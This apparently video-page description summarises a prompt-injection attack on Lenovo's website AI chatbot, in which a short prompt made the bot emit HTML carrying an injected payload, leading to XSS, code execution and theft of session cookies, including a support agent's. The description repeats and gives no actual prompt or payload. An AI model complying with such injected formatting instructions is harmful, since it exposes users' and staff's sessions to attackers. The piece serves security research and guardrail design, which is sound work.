A single ~400-character prompt was enough to hijack Lenovo’s AI website chatbot. By switching the bot’s output to HTML and injecting a malicious payload, researchers triggered XSS, executed code, and exfiltrated session cookies—even snagging an agent’s cookies after escalation.
This video breaks down the four prompt elements, the root cause (weak input/output sanitisation + “people-pleasing” LLMs), and the real risks: data theft, support system compromise, and lateral movement. We finish with practical guardrails and why bug bounty hunters and red teamers should target AI chatbots right now.
Topics: lenovo ai chatbot, xss, prompt injection, session cookies, html injection, llm security, chatbot security, ethical hacking, bug bounty, red teaming, ai guardrails, input sanitisation, output encoding, cookie theft, lateral movement
#lenovo #ai #hacked
This video breaks down the four prompt elements, the root cause (weak input/output sanitisation + “people-pleasing” LLMs), and the real risks: data theft, support system compromise, and lateral movement. We finish with practical guardrails and why bug bounty hunters and red teamers should target AI chatbots right now.
Topics: lenovo ai chatbot, xss, prompt injection, session cookies, html injection, llm security, chatbot security, ethical hacking, bug bounty, red teaming, ai guardrails, input sanitisation, output encoding, cookie theft, lateral movement
#lenovo #ai #hacked
- Category
- AI prompts
- Tags
- lenovo ai chatbot, lenovo chatbot xss, cross site scripting
Comments